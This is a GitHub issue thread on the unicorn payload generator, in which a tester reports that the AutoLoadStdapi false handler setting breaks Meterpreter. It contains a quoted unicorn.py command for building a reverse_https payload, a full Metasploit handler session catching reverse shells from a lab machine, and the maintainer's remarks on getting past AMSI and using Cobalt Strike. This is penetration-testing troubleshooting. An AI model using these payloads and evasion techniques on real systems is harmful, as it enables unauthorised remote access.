trustedsec/unicorn

[-] Unknown command: shell. set AutoLoadStdapi false stops Meterpreter working as expected.

myexploit opened this issue · 2 comments

Nice work on the update, by the way. AMSI seems to spot the "PS Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443" example, but I'm getting shells, and that keeps me happy.

I have spotted that if you include AutoLoadStdapi false in your MSF handler script, as is now included in unicorn.rc, you don't seem to be able to use most of the Meterpreter functions.

I just spotted it while testing the update.

Below is my testing:

msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_https
payload => windows/meterpreter/reverse_https
msf5 exploit(multi/handler) > set LHOST 192.168.1.29
LHOST => 192.168.1.29
msf5 exploit(multi/handler) > set LPORT 443
LPORT => 443
msf5 exploit(multi/handler) > set ExitOnSession false
ExitOnSession => false
msf5 exploit(multi/handler) > set AutoVerifySession false
AutoVerifySession => false
msf5 exploit(multi/handler) > set AutoSystemInfo false
AutoSystemInfo => false
msf5 exploit(multi/handler) > set AutoLoadStdapi false
AutoLoadStdapi => false
msf5 exploit(multi/handler) > exploit -j

[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf5 exploit(multi/handler) >
[*] Started HTTPS reverse handler on https://192.168.1.29:443
[*] https://192.168.1.29:443 handling request from 192.168.1.28; (UUID: 7uxscvzs) Attaching orphaned/stageless session...

msf5 exploit(multi/handler) >
[*] Meterpreter session 1 opened (192.168.1.29:443 -> 192.168.1.28:49215) at 2019-05-16 17:06:44 +0100
msf5 exploit(multi/handler) >
msf5 exploit(multi/handler) >
[*] https://192.168.1.29:443 handling request from 192.168.1.28; (UUID: 7uxscvzs) Attaching orphaned/stageless session...
[*] Meterpreter session 2 opened (192.168.1.29:443 -> 192.168.1.28:49216) at 2019-05-16 17:06:45 +0100

msf5 exploit(multi/handler) >
msf5 exploit(multi/handler) >
msf5 exploit(multi/handler) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > shell
[-] Unknown command: shell.
meterpreter > background

Retrying without the "set AutoLoadStdapi false" switch.

msf5 > use multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_https
payload => windows/meterpreter/reverse_https
msf5 exploit(multi/handler) > set LHOST 192.168.1.29
LHOST => 192.168.1.29
msf5 exploit(multi/handler) > set LPORT 443
LPORT => 443
msf5 exploit(multi/handler) > exploit -j

[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf5 exploit(multi/handler) >
[*] Started HTTPS reverse handler on https://192.168.1.29:443
[*] https://192.168.1.29:443 handling request from 192.168.1.28; (UUID: lbheaqqo) Attaching orphaned/stageless session...
[*] Meterpreter session 1 opened (192.168.1.29:443 -> 192.168.1.28:49238) at 2019-05-16 17:08:01 +0100
[*] https://192.168.1.29:443 handling request from 192.168.1.28; (UUID: lbheaqqo) Attaching orphaned/stageless session...
[*] Meterpreter session 2 opened (192.168.1.29:443 -> 192.168.1.28:49239) at 2019-05-16 17:08:03 +0100

msf5 exploit(multi/handler) >
msf5 exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > shell
Process 3948 created.
Channel 2 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

Thanks! This is expected: if you load stdapi as part of the initial stager, in my testing it would kill the shell. The problem is there are a lot of hardcoded things inside of MSF, and unfortunately it's a cat/mouse game on that front. While Unicorn bypasses AMSI, the shellcode loaders in MSF are problematic. Custom C2 would be fine, or Cobalt Strike as an example.

That makes sense, I will try CS tomorrow. Cheers for the quick reply.